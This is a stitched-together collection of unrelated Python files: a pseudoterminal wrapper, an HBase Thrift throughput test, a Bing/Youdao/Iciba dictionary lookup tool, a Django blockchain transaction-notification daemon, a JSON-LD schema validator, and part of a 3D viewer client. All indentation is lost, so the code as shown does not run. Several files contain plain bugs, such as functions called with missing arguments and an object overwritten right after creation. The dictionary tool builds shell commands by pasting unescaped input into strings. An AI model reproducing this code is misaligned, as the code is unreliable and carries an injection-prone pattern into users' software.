Can block if there is nothing to read. Raises :exc:`EOFError` if the
terminal was closed.
"""
buf = []
while 1:
try:
ch = self.read(1)
except EOFError:
return ''.join(buf)
buf.append(ch)
if ch == '\n':
return ''.join(buf)
def write(self, s):
"""Write the string ``s`` to the pseudoterminal.
Returns the number of bytes written.
"""
if not self.isalive():
raise EOFError('Pty is closed')
if PY2:
s = _unicode(s)
success, nbytes = self.pty.write(s)
if not success:
raise IOError('Write failed')
return nbytes
def terminate(self, force=False):
"""This forces a child process to terminate."""
if not self.isalive():
return True
self.kill(signal.SIGINT)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
if force:
self.kill(signal.SIGKILL)
time.sleep(self.delayafterterminate)
if not self.isalive():
return True
else:
return False
def wait(self):
"""This waits until the child exits. This is a blocking call. This will
not read any data from the child.
"""
while self.isalive():
time.sleep(0.1)
return self.exitstatus
def isalive(self):
"""This tests if the child process is running or not. This is
non-blocking. If the child was terminated then this will read the
exitstatus or signalstatus of the child. This returns True if the child
process appears to be running or False if not.
"""
return self.pty and self.pty.isalive()
def kill(self, sig=None):
"""Kill the process with the given signal.
"""
os.kill(self.pid, sig)
def sendcontrol(self, char):
'''Helper method that wraps send() with mnemonic access for sending control
character to the child (such as Ctrl-C or Ctrl-D). For example, to send
Ctrl-G (ASCII 7, bell, '\a')::
child.sendcontrol('g')
See also, sendintr() and sendeof().
'''
char = char.lower()
a = ord(char)
if 97 <= a <= 122:
a = a - ord('a') + 1
byte = bytes([a])
return self.pty.write(byte.decode('utf-8')), byte
d = {
'@': 0,
'`': 0,
'[': 27,
'{': 27,
'\\': 28,
'|': 28,
']': 29,
'}': 29,
'^': 30,
'~': 30,
'_': 31,
'?': 127
}
if char not in d:
return 0, b''
byte = bytes([d[char]])
return self.pty.write(byte.decode('utf-8')), byte
def sendeof(self):
"""This sends an EOF to the child. This sends a character which causes
the pending parent output buffer to be sent to the waiting child
program without waiting for end-of-line. If it is the first character
of the line, the read() in the user program returns 0, which signifies
end-of-file. This means to work as expected a sendeof() has to be
called at the beginning of a line. This method does not send a newline.
It is the responsibility of the caller to ensure the eof is sent at the
beginning of a line."""
# Send control character 4 (Ctrl-D)
self.pty.write('\x04'), '\x04'
def sendintr(self):
"""This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. """
# Send control character 3 (Ctrl-C)
self.pty.write('\x03'), '\x03'
def eof(self):
"""This returns True if the EOF exception was ever raised.
"""
return self.flag_eof
def getwinsize(self):
"""Return the window size of the pseudoterminal as a tuple (rows, cols).
"""
return self._winsize
def setwinsize(self, rows, cols):
"""Set the terminal window size of the child tty.
"""
self._winsize = (rows, cols)
self.pty.set_size(cols, rows)
def _read_in_thread(address, pty):
"""Read data from the pty in a thread.
"""
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(address)
while 1:
data = pty.read(4096)
if not data and not pty.isalive():
while not data and not pty.iseof():
time.sleep(0.1)
data += pty.read(4096)
if not data:
try:
client.send(b'')
except socket.error:
pass
break
try:
client.send(data)
except socket.error:
break
client.close()
def _get_address(default_port=20128):
"""Find and return a non used port"""
while True:
try:
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP
)
sock.bind(("127.0.0.1", default_port))
except socket.error as _msg: # analysis:ignore
default_port += 1
else:
break
finally:
sock.close()
sock = None
return ("127.0.0.1", default_port)
def _unicode(s):
"""Ensure that a string is Unicode on Python 2.
"""
if isinstance(s, unicode): # noqa E891
return s
return s.decode('utf-8')
|
thrift_test.py
|
# encoding=utf-8
from timer import Timer
import time
import random
from multiprocessing import Process
'''''
该脚本用于尝试 使用 python 通过 Thrift 连接并操作 HBase 数据库
prepare:
1. 启动 ThriftServer 于 HBASE
> hbase-deamn.sh start thrift/thrift2
> 在此,HBASE提供两种 thrift/thrift2 由于种种原因,语法并不兼容,其中 2 的语法封装更优雅,但部分 DDL 操作
不完善,而且 thrift API 资料相对多一些,所以先使用thrift 尝试
2. jps 应该有 ThriftServer 进程
3.Python 需要安装 thrift 和 hbase 模块,有网络的直接 pip,没有网络的把相同版本的模块代码下载下来用 sys.path.append('PATH') 引用,安装后的代码一般在 $PYTHON_HOME/Lib/site-packages
> pip install thrift
pip install hbase-thrift
'''
from thrift import Thrift
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
import sys
'''
# server端地址和端口,web是HMaster也就是thriftServer主机名,9090是thriftServer默认端口
transport = TSocket.TSocket('192.168.5.48', 6666)
# 可以设置超时
transport.setTimeout(5000)
# 设置传输方式(TFramedTransport或TBufferedTransport)
trans = TTransport.TBufferedTransport(transport)
# 设置传输协议
protocol = TBinaryProtocol.TBinaryProtocol(trans)
# 确定客户端
client = Hbase.Client(protocol)
# 打开连接
transport.open()
'''
from hbase.ttypes import ColumnDescriptor, Mutation, BatchMutation, TRegionInfo
from hbase.ttypes import IOError, AlreadyExists
tableName = "users"
rowkey = "58339"
# 获取所有表名
'''
tableNames = client.getTableNames()
print('tableNames:',tableNames)
# 获取列族,返回map
columnDescriptors = client.getColumnDescriptors(tableName)
print("columnName",columnDescriptors)
# 获取该表的所有Regions,包括起止key等信息,返回list
tableRegions = client.getTableRegions(tableName)
'''
# 获取行(tableName,rowKey) return List<TRowResult>
'''
timer = Timer()
timer.stage_begin('get row')
row = client.getRow(tableName,rowkey)
'''
#print("row:",row)
# 获取 row 里的某一列
#timer.stage_begin('get col')
#rowColumn = client.get(tableName,rowkey,"cf:content")
#print("rowColumn",len(rowColumn) )
# 获取 row 里的多列时间戳最新的,None 则为所有列
#rowColumns = client.getRowWithColumns(tableName,rowkey,["bbdi:openId","bbdi:tempLogId"])
#print("rowColumns",rowColumns)
# client.mutateRow(tableName[1],"jason",)
'''
# 创建表
try:
# 创建列族,这里只传了第一个参数 name
struct ColumnDescriptor {
1:Text name,
2:i32 maxVersions = 3,
3:string compression = "NONE",
4:bool inMemory = 0,
5:string bloomFilterType = "NONE",
6:i32 bloomFilterVectorSize = 0,
7:i32 bloomFilterNbHashes = 0,
8:bool blockCacheEnabled = 0,
9:i32 timeToLive = -1
}
desc = ColumnDescriptor(name="colNameTest1")
# 创建表 (tableMame,[列族们])
client.createTable('our_table1', [desc])
print client.getTableNames()
except AlreadyExists, tx:
print "Thrift exception"
print '%s' % (tx.message)
'''
'''
# 插入行
timer.stage_begin('put')
content = open('1_2_3.jpeg').read()
print len(content)
mutations = [Mutation(column="cf:content", value=content)]
client.mutateRow("users","12345",mutations)
timer.finish()
print timer.dump()
sys.exit(0)
#插入多行
rowMutations = [BatchMutation("rowkey1",mutations),BatchMutation("rowkey2",mutations)]
client.mutateRows("our_table1",rowMutations)
# 删除一行
client.deleteAllRow("our_table1","rowkey2")
# scan
# ScannerID scannerOpen(Text tableName, Text startRow, list<Text> columns)
scanId = client.scannerOpen("our_table1","",["colNameTest1"])
scanRescult = client.scannerGet(scanId) #从scan中取一条
scanRescult1 = client.scannerGetList(scanId,50) #从scan中取多条,同一个ScanID 上面去过一条,下面就取不到了
print(scanRescult)
print(scanRescult1)
# 关闭该扫描
client.scannerClose(scanId);
'''
content = open('1_2_3.jpeg').read()
def put_one(key, client):
timer = Timer()
timer.stage_begin('put')
#content = open('1_2_3.jpeg').read()
print len(content)
print "cf:content"
mutations = [Mutation(column="cf:content", value=content)]
client.mutateRow("users", key, mutations)
timer.finish()
print timer.dump()
def task(msg):
for i in range(int(sys.argv[2])):
key = str(random.randint(0, 100000))
put_one(key)
def main1():
plist = []
beg = time.time()
num_task = int(sys.argv[1])
num_row = int(sys.argv[2])
for i in range(num_task):
p = Process(target=task, args=('world',))
plist.append(p)
p.start()
for p in plist:
p.join()
end = time.time()
print end - beg
print (end - beg) / num_task / num_row
print 1.06 * num_task * num_row / (end - beg) * 8
class WriteProcess(Process):
def run(self):
# server端地址和端口,web是HMaster也就是thriftServer主机名,9090是thriftServer默认端口
transport = TSocket.TSocket('localhost', 6666)
#transport = TSocket.TSocket('localhost', 6666)
# 可以设置超时
#transport.setTimeout(8000)
# 设置传输方式(TFramedTransport或TBufferedTransport)
trans = TTransport.TBufferedTransport(transport)
# 设置传输协议
protocol = TBinaryProtocol.TBinaryProtocol(trans)
# 确定客户端
client = Hbase.Client(protocol)
# 打开连接
transport.open()
total = 0.
for i in range(int(sys.argv[2])):
key = str(random.randint(0, 10000))
key = str(i)
beg = time.time()
put_one(key, client)
end = time.time()
total += end - beg
print 'total:', total
print 'avg:', total / int(sys.argv[2])
def get_row(table, rowkey, client):
timer = Timer()
#timer.stage_begin('get row')
#row = client.getRow(tableName,rowkey)
timer.stage_begin('get col')
rowColumn = client.get(table, rowkey, "cf:content")
print len(rowColumn)
if rowColumn:
print 'content len', len(rowColumn[0].value)
timer.finish()
print timer.dump()
class ReadProcess(Process):
def __init__(self):
Process.__init__(self)
#self.total = 0.0
def run(self):
# server端地址和端口,web是HMaster也就是thriftServer主机名,9090是thriftServer默认端口
transport = TSocket.TSocket('localhost', 6666)
# 可以设置超时
transport.setTimeout(5000)
# 设置传输方式(TFramedTransport或TBufferedTransport)
trans = TTransport.TBufferedTransport(transport)
# 设置传输协议
protocol = TBinaryProtocol.TBinaryProtocol(trans)
# 确定客户端
client = Hbase.Client(protocol)
# 打开连接
transport.open()
total = 0.0
for i in range(int(sys.argv[2])):
key = str(i)
key = str(random.randint(0, 1999))
beg = time.time()
get_row('users', key, client)
end = time.time()
total += end - beg
print 'total:', total
print 'avg:', total / int(sys.argv[2])
def main():
plist = []
beg = time.time()
num_task = int(sys.argv[1])
num_row = int(sys.argv[2])
for i in range(num_task):
p = ReadProcess()
p = WriteProcess()
plist.append(p)
for p in plist:
p.start()
for p in plist:
p.join()
total = 0.0
end = time.time()
print end - beg
print (end - beg) / num_task / num_row
print 'avg tps', num_task * num_row / (end - beg)
print 1.06 * num_task * num_row / (end - beg) * 8
if __name__ == '__main__':
main()
|
translate_py3.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*
import os
import argparse
import dbm
import re
from multiprocessing.dummy import Pool as ThreadPool
from multiprocessing import Process
class Bing(object):
def __init__(self):
super(Bing, self).__init__()
def query(self, word):
import requests
from bs4 import BeautifulSoup
sess = requests.Session()
headers = {
'Host': 'cn.bing.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
}
sess.headers.update(headers)
url = 'http://cn.bing.com/dict/SerpHoverTrans?q=%s' % (word)
try:
resp = sess.get(url, timeout=100)
except:
return None
text = resp.text
if (resp.status_code == 200) and (text):
soup = BeautifulSoup(text, 'lxml')
if soup.find('h4').text.strip() != word:
return None
lis = soup.find_all('li')
trans = []
for item in lis:
transText = item.get_text()
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
class Youdao(object):
def __init__(self):
super(Youdao, self).__init__()
def query(self, word):
import requests
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
sess = requests.Session()
headers = {
'Host': 'dict.youdao.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate'
}
sess.headers.update(headers)
url = 'http://dict.youdao.com/fsearch?q=%s' % (word)
try:
resp = sess.get(url, timeout=100)
except:
return None
text = resp.content
if (resp.status_code == 200) and (text):
tree = ET.ElementTree(ET.fromstring(text))
returnPhrase = tree.find('return-phrase')
if returnPhrase.text.strip() != word:
return None
customTranslation = tree.find('custom-translation')
if not customTranslation:
return None
trans = []
for t in customTranslation.findall('translation'):
transText = t[0].text
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
class Iciba(object):
def __init__(self):
super(Iciba, self).__init__()
def query(self, word):
import requests
from bs4 import BeautifulSoup
sess = requests.Session()
headers = {
'Host': 'open.iciba.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate'
}
sess.headers.update(headers)
url = 'http://open.iciba.com/huaci_new/dict.php?word=%s' % (word)
try:
resp = sess.get(url, timeout=100)
text = resp.text
pattern = r'(<div class=\\\"icIBahyI-group_pos\\\">[\s\S]+?</div>)'
text = re.search(pattern, text).group(1)
except:
return None
if (resp.status_code == 200) and (text):
soup = BeautifulSoup(text, 'lxml')
ps = soup.find_all('p')
trans = []
for item in ps:
transText = item.get_text()
transText = re.sub(
r'\s+', ' ', transText.replace('\t', '')).strip()
if transText:
trans.append(transText)
return '\n'.join(trans)
else:
return None
path = os.path.dirname(os.path.realpath(__file__))
DEFAULT_SERVICE = 'bing'
class Client(object):
def __init__(self, word, service=None, webonly=False):
super(Client, self).__init__()
if not service:
service = DEFAULT_SERVICE
self.service = service
self.word = word
self.trans = None
if webonly:
self.db = {}
else:
self.db = dbm.open(path + '/data/vocabulary', 'c')
def translate(self):
trans = self.db.get(self.word)
if trans:
return trans.decode('utf-8')
else:
if self.service == 'bing':
S = Bing()
if self.service == 'youdao':
S = Youdao()
elif self.service == 'iciba':
S = Iciba()
trans = S.query(self.word)
self.trans = trans
return trans
def suggest(self):
if re.sub(r'[a-zA-Z\d\'\-\.\s]', '', self.word):
return None
import enchant
try:
d = enchant.DictWithPWL(
'en_US', path + '/data/spell-checker/american-english-large')
except:
d = enchant.Dict('en_US')
suggestion = d.suggest(self.word)
return suggestion
def pronounce(self, tts):
if tts == 'festival':
cmd = ' echo "%s" | festival --tts > /dev/null 2>&1' % (self.word)
elif tts == 'espeak':
cmd = 'espeak -v en-us "%s" > /dev/null 2>&1' % (self.word)
elif tts == 'real':
cmd = 'find %s/data/RealPeopleTTS/ -type f -iname "%s.wav" | head -n1 | xargs -I {} aplay {} > /dev/null 2>&1' % (
path, self.word)
import commands
try:
status, output = commands.getstatusoutput(cmd)
except:
pass
return True
def updateDB(self):
if self.trans:
self.db[self.word] = self.trans.encode('utf-8')
self.db.close()
return True
def parseArgs():
parser = argparse.ArgumentParser()
#parser.add_argument('word', help="word or 'some phrase'")
parser.add_argument('-n', '--nostorage', dest='nostorage',
action='store_true', help='turn off data storage')
parser.add_argument('-p', '--pronounce', dest='pronounce', choices=[
'espeak', 'festival', 'real'], help="text-to-speech software: 'espeak', 'festival' or 'real'")
parser.add_argument('-s', '--service', dest='service', choices=[
'bing', 'youdao', 'iciba'], help="translate service: 'bing', 'youdao' or 'iciba'")
parser.add_argument('-w', '--webonly', dest='webonly',
action='store_true', help='ignore local data')
parser.add_argument('-V', '--version', action='version',
version='%(prog)s 0.1.3')
return parser.parse_args()
if __name__ == '__main__':
args = parseArgs()
word = 'hello' #args.word.strip()
service = args.service
webonly = args.webonly
if service:
webonly = True
C = Client(word, service=service, webonly=webonly)
pool = ThreadPool()
_trans = pool.apply_async(C.translate)
_suggestion = pool.apply_async(C.suggest)
trans = _trans.get()
if trans:
if args.pronounce:
p1 = Process(target=C.pronounce, args=(args.pronounce,))
p1.daemon = True
p1.start()
if not args.nostorage:
p2 = Process(target=C.updateDB)
p2.daemon = True
p2.start()
else:
suggestion = _suggestion.get()
if not suggestion:
print('No translations found for \"%s\" .' % (word))
else:
print('No translations found for \"%s\", maybe you meant:\
\n\n%s' % (word, ' / '.join(suggestion)))
|
daemon.py
|
import logging
import time
from django.conf import settings
from django.db import connections, connection
from django.db.models import F
from django.utils import timezone
from threading import Thread
from gcoinrpc import connect_to_remote
import requests
from notification.models import AddressSubscription, TxSubscription
from notification.models import AddressNotification, TxNotification
from notification.models import LastSeenBlock
logger = logging.getLogger(__name__)
RETRY_TIMES = 5
SLEEP_TIME = 5
def close_connection():
for conn in connections.all():
conn.close_if_unusable_or_obsolete()
connection.close()
def get_rpc_connection():
return connect_to_remote(settings.BITCOIN_RPC['user'],
settings.BITCOIN_RPC['password'],
settings.BITCOIN_RPC['host'],
settings.BITCOIN_RPC['port'])
class BitcoinRPCMixin(object):
def __init__(self):
self.conn = get_rpc_connection()
def get_block(self, block_hash):
return self.conn.getblock(block_hash)
def get_best_block(self):
return self.get_block(self.conn.getbestblockhash())
def get_transaction(self, tx_hash):
return self.conn.getrawtransaction(tx_hash)
class TxNotifyDaemon(BitcoinRPCMixin):
def __init__(self):
super(TxNotifyDaemon, self).__init__()
self.last_seen_block = None
def call_request(self, post_data, notification):
headers = {'content-type': "application/x-www-form-urlencoded"}
try:
response = requests.post(notification.subscription.callback_url,
headers=headers,
data=post_data
)
close_connection()
if response.status_code == 200:
TxNotification.objects.filter(id=notification.id).update(
is_notified=True,
notification_attempts=F('notification_attempts') + 1,
notification_time=timezone.now()
)
else:
TxNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error("Request url: {}".format(notification.subscription.callback_url))
logger.error("Notification id: {}".format(notification.id))
try:
TxNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
def start_notify(self, notifications):
if notifications.count() == 0:
return
for notification in notifications:
post_data = {
'notification_id': notification.id,
'subscription_id': notification.subscription.id,
'tx_hash': notification.subscription.tx_hash,
}
thread = Thread(target=self.call_request, args=(post_data, notification, ))
thread.start()
def run_forever(self, test=False):
while True:
try:
best_block = self.get_best_block()
if self.last_seen_block is None or self.last_seen_block['hash'] != best_block['hash']:
new_notifications = []
tx_subscriptions = TxSubscription.objects.filter(txnotification=None)
for tx_subscription in tx_subscriptions:
logger.debug('check tx hash: {}'.format(tx_subscription.tx_hash))
try:
tx = self.get_transaction(tx_subscription.tx_hash)
if hasattr(tx, 'confirmations') and tx.confirmations >= tx_subscription.confirmation_count:
new_notifications.append(TxNotification(subscription=tx_subscription))
except Exception as e:
# transaction does not exist
continue
TxNotification.objects.bulk_create(new_notifications)
notifications = TxNotification.objects.filter(is_notified=False,
notification_attempts__lt=RETRY_TIMES)
self.start_notify(notifications)
self.last_seen_block = best_block
except Exception as e:
logger.error(e)
if test:
return
close_connection()
time.sleep(SLEEP_TIME)
class AddressNotifyDaemon(BitcoinRPCMixin):
def call_request(self, post_data, notification):
headers = {'content-type': "application/x-www-form-urlencoded"}
try:
response = requests.post(notification.subscription.callback_url,
headers=headers,
data=post_data
)
close_connection()
if response.status_code == 200:
AddressNotification.objects.filter(id=notification.id).update(
is_notified=True,
notification_attempts=F('notification_attempts') + 1,
notification_time=timezone.now()
)
else:
AddressNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
logger.error("Request url: {}".format(notification.subscription.callback_url))
logger.error("Notification id: {}".format(notification.id))
try:
AddressNotification.objects.filter(id=notification.id).update(
notification_attempts=F('notification_attempts') + 1,
)
except Exception as e:
logger.error(e)
def start_notify(self):
notifications = AddressNotification.objects.filter(is_notified=False, notification_attempts__lt=RETRY_TIMES).prefetch_related('subscription')
notifications = list(notifications)
for notification in notifications:
post_data = {
'notification_id': notification.id,
'subscription_id': notification.subscription.id,
'tx_hash': notification.tx_hash,
}
thread = Thread(target=self.call_request, args=(post_data, notification,))
thread.start()
def run_forever(self):
while True:
try:
# get new blocks since last round
new_blocks = self.get_new_blocks()
if new_blocks:
# create a address -> txs map from new blocks
for block in new_blocks:
addr_txs_map = self.create_address_txs_map(block)
if bool(addr_txs_map):
# create AddressNotification instance in database
self.create_notifications(addr_txs_map)
self.start_notify()
self.set_last_seen_block(block['hash'])
except Exception as e:
logger.error(e)
close_connection()
time.sleep(SLEEP_TIME)
def get_new_blocks(self):
"""
Get new blocks since last update
"""
last_seen_block = self.get_last_seen_block()
best_block = self.get_best_block()
if last_seen_block['confirmations'] < 1:
# fork happened, find the branching point and set it as last seen block
block = last_seen_block
while block['confirmations'] < 1:
block = self.get_block(block['previousblockhash'])
last_seen_block = block
# find all new blocks since last seen block in main chain
block = best_block
new_blocks = []
if block['hash'] == last_seen_block['hash']:
return new_blocks
while block['hash'] != last_seen_block['hash']:
new_blocks.append(block)
block = self.get_block(block['previousblockhash'])
return new_blocks[::-1]
def create_address_txs_map(self, block):
addr_txs_map = {}
# Note: this for loop can be optimized if core supports rpc to get all tx in a block
try:
for tx_hash in block['tx']:
tx = self.get_transaction(tx_hash)
# find all the addresses that related to this tx
related_addresses = self.get_related_addresses(tx)
for address in related_addresses:
if address in addr_txs_map:
addr_txs_map[address].append(tx)
else:
addr_txs_map[address] = [tx]
except Exception as e:
logger.error(e)
return addr_txs_map
def create_notifications(self, addr_txs_map):
try:
subscriptions = AddressSubscription.objects.all()
new_notifications = []
# Only the address that is in addr_txs_map and subscription needs to be notified,
# so iterate through the small one is more efficient
if len(addr_txs_map) < subscriptions.count():
for address, txs in addr_txs_map.iteritems():
for tx in txs:
for subscription in subscriptions.filter(address=address):
new_notifications.append(AddressNotification(subscription=subscription, tx_hash=tx.txid))
else:
for subscription in subscriptions:
if subscription.address in addr_txs_map:
for tx in addr_txs_map[subscription.address]:
new_notifications.append(AddressNotification(subscription=subscription, tx_hash=tx.txid))
AddressNotification.objects.bulk_create(new_notifications)
except Exception as e:
logger.error(e)
def get_related_addresses(self, tx):
if tx.type == 'NORMAL' and 'coinbase' in tx.vin[0]:
# this tx is the first tx of every block, just skip
return []
addresses = []
# addresses in vin
for vin in tx.vin:
if 'coinbase' not in vin:
prev_vout = self.get_prev_vout(vin['txid'], vin['vout'])
addresses.extend(self.get_address_from_vout(prev_vout))
# addresses in vout
for vout in tx.vout:
addresses.extend(self.get_address_from_vout(vout))
return list(set(addresses))
def get_prev_vout(self, tx_hash, n):
tx = self.get_transaction(tx_hash)
return tx.vout[n]
def get_address_from_vout(self, vout):
script_pub_key = vout['scriptPubKey']
return script_pub_key.get('addresses', [])
def set_last_seen_block(self, block_hash):
try:
lastSeenBlock = LastSeenBlock.objects.filter(name='AddressNotifyDaemon').first()
lastSeenBlock.name = 'AddressNotifyDaemon'
lastSeenBlock.block_hash = block_hash
lastSeenBlock.save()
except Exception as e:
logger.error(e)
def get_last_seen_block(self):
try:
last_block = LastSeenBlock.objects.filter(name='AddressNotifyDaemon').first()
if last_block:
return self.conn.getblock(last_block.block_hash)
else:
genesis_block = self.conn.getblock(self.conn.getblockhash(0))
LastSeenBlock.objects.create(name='AddressNotifyDaemon', block_hash=genesis_block['hash'])
return genesis_block
except LastSeenBlock.DoesNotExist as e:
logger.error(e)
|
validate.py
|
import requests
import requests_cache
import tempfile
requests_cache.install_cache(tempfile.mkdtemp())
from pyld import jsonld
from pyshacl import validate
import json
import os
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
def simple_http_server(host='localhost', port=4001, path='.'):
"""
From: https://stackoverflow.com/a/38943044
"""
server = HTTPServer((host, port), SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.deamon = True
cwd = os.getcwd()
def start():
os.chdir(path)
thread.start()
print('starting server on port {}'.format(server.server_port))
def stop():
os.chdir(cwd)
server.shutdown()
server.socket.close()
print('stopping server on port {}'.format(server.server_port))
return start, stop
data_file_format = 'nquads'
shape_file_format = 'turtle'
def validate_data(data, root, shape_file_path):
base_url = f"http://localhost:8000/{root}/"
normalized = jsonld.normalize(data,
{'algorithm': 'URDNA2015',
'base': base_url,
'format': 'application/n-quads'})
conforms, v_graph, v_text = validate(normalized,
shacl_graph=shape_file_path,
data_graph_format=data_file_format,
shacl_graph_format=shape_file_format,
inference='rdfs', debug=False,
serialize_report_graph=True)
print(base_url + name, 'Conforms:', conforms)
if not conforms:
raise ValueError(v_text)
start, stop = simple_http_server(port=8000, path=os.getcwd())
start()
for root, dirs, files in os.walk('activities'):
for name in files:
full_file_name = os.path.join(root, name)
with open(full_file_name) as json_file:
try:
data = json.load(json_file)
if '@type' not in data:
raise ValueError(f"{full_file_name} missing @type")
if data['@type'] == 'reproschema:Protocol':
shape_file_path = 'validation/ProtocolShape.ttl'
elif data['@type'] == 'reproschema:Activity':
shape_file_path = 'validation/ActivityShape.ttl'
elif data['@type'] == 'reproschema:Field':
shape_file_path = 'validation/FieldShape.ttl'
elif data['@type'] == 'reproschema:ResponseOptions':
shape_file_path = 'validation/ResponseOptionsShape.ttl'
validate_data(data, root, shape_file_path)
except ValueError as e:
print ("File '%s' has validation errors: \n %s" %(full_file_name, e))
stop()
requests_cache.clear()
raise
stop()
requests_cache.clear()
|
viewerclient.py
|
# Used only in removed tests, To REMOVE
import time
import json
import os
import tempfile
import threading
from collections import defaultdict, Iterable
import numpy as np
from lcm import LCM
from robotlocomotion import viewer2_comms_t
from director.thirdparty import transformations
class ClientIDFactory(object):
def __init__(self):
self.pid = os.getpid()
self.counter = 0
def new_client_id(self):
self.counter += 1
return "py_{:d}_{:d}".format(self.pid, self.counter)
CLIENT_ID_FACTORY = ClientIDFactory()
def to_lcm(data):
msg = viewer2_comms_t()
msg.utime = data["utime"]
msg.format = "treeviewer_json"
msg.format_version_major = 1
msg.format_version_minor = 0
msg.data = bytearray(json.dumps(data), encoding="utf-8")
msg.num_bytes = len(msg.data)
return msg
def serialize_transform(tform):
return {
"translation": list(transformations.translation_from_matrix(tform)),
"quaternion": list(transformations.quaternion_from_matrix(tform)),
}
class GeometryData(object):
__slots__ = ["geometry", "color", "transform"]
def __init__(self, geometry, color=(1.0, 1.0, 1.0, 1.0), transform=np.eye(4)):
self.geometry = geometry
self.color = color
self.transform = transform
def serialize(self):
params = self.geometry.serialize()
params["color"] = list(self.color)
params["transform"] = serialize_transform(self.transform)
return params
class BaseGeometry(object):
def serialize(self):
raise NotImplementedError()
class Box(BaseGeometry):
__slots__ = ["lengths"]
def __init__(self, lengths=[1, 1, 1]):
self.lengths = lengths
def serialize(self):
return {"type": "box", "lengths": list(self.lengths)}
class Sphere(BaseGeometry):
__slots__ = ["radius"]
def __init__(self, radius=1):
self.radius = radius
def serialize(self):
return {"type": "sphere", "radius": self.radius}
class Ellipsoid(BaseGeometry):
__slots__ = ["radii"]
def __init__(self, radii=[1, 1, 1]):
self.radii = radii
def serialize(self):
return {"type": "ellipsoid", "radii": list(self.radii)}
class Cylinder(BaseGeometry):
__slots__ = ["length", "radius"]
def __init__(self, length=1, radius=1):
self.length = length
self.radius = radius
def serialize(self):
return {"type": "cylinder", "length": self.length, "radius": self.radius}
class Triad(BaseGeometry):
__slots__ = ["tube", "scale"]
def __init__(self, scale=1.0, tube=False):
self.scale = scale
self.tube = tube
def serialize(self):
return {"type": "triad", "scale": self.scale, "tube": self.tube}
class PolyLine(BaseGeometry):
def __init__(
self,
points,
radius=0.01,
closed=False,
start_head=False,
end_head=False,
head_radius=0.05,
head_length=None,
):
self.points = points
self.radius = radius
self.closed = closed
self.start_head = start_head
self.end_head = end_head
self.head_radius = head_radius
self.head_length = head_length if head_length is not None else head_radius
def serialize(self):
data = {
"type": "line",
"points": self.points,
"radius": self.radius,
"closed": self.closed,
}
if self.start_head or self.end_head:
data["start_head"] = self.start_head
data["end_head"] = self.end_head
data["head_radius"] = self.head_radius
data["head_length"] = self.head_length
return data
class LazyTree(object):
__slots__ = ["geometries", "transform", "children"]
def __init__(self, geometries=None, transform=np.eye(4)):
if geometries is None:
geometries = []
self.geometries = geometries
self.transform = transform
self.children = defaultdict(lambda: LazyTree())
def __getitem__(self, item):
return self.children[item]
def getdescendant(self, path):
t = self
for p in path:
t = t[p]
return t
def descendants(self, prefix=tuple()):
result = []
for (key, val) in list(self.children.items()):
childpath = prefix + (key,)
result.append(childpath)
result.extend(val.descendants(childpath))
return result
class CommandQueue(object):
def __init__(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
def isempty(self):
return not (self.settransform or self.setgeometry or self.delete)
def empty(self):
self.settransform = set()
self.setgeometry = set()
self.delete = set()
class Visualizer(object):
"""
A Visualizer is a lightweight object that contains a CoreVisualizer and a
path. The CoreVisualizer does all of the work of storing geometries and
publishing LCM messages. By storing the path in the Visualizer instance,
we make it easy to do things like store or pass a Visualizer that draws to
a sub-part of the viewer tree.
Many Visualizer objects can all share the same CoreVisualizer.
"""
__slots__ = ["core", "path"]
def __init__(self, path=None, lcm=None, core=None):
if core is None:
core = CoreVisualizer(lcm)
if path is None:
path = tuple()
else:
if isinstance(path, str):
path = tuple(path.split("/"))
if not path[0]:
path = tuple([p for p in path if p])
self.core = core
self.path = path
def setgeometry(self, geomdata):
"""
Set the geometries at this visualizer's path to the given
geomdata (replacing whatever was there before).
geomdata can be any one of:
* a single BaseGeometry
* a single GeometryData
* a collection of any combinations of BaseGeometry and GeometryData
"""
self.core.setgeometry(self.path, geomdata)
return self
def settransform(self, tform):
"""
Set the transform for this visualizer's path (and, implicitly,
any descendants of that path).
tform should be a 4x4 numpy array representing a homogeneous transform
"""
self.core.settransform(self.path, tform)
def delete(self):
"""
Delete the geometry at this visualizer's path.
"""
self.core.delete(self.path)
def __getitem__(self, path):
"""
Indexing into a visualizer returns a new visualizer with the given
path appended to this visualizer's path.
"""
return Visualizer(path=self.path + (path,), lcm=self.core.lcm, core=self.core)
def start_handler(self):
"""
Start a Python thread that will subscribe to messages from the remote
viewer and handle those responses. This enables automatic reloading of
geometry into the viewer if, for example, the viewer is restarted
later.
"""
self.core.start_handler()
class CoreVisualizer(object):
def __init__(self, lcm=None):
if lcm is None:
lcm = LCM()
self.lcm = lcm
self.client_id = CLIENT_ID_FACTORY.new_client_id()
self.tree = LazyTree()
self.queue = CommandQueue()
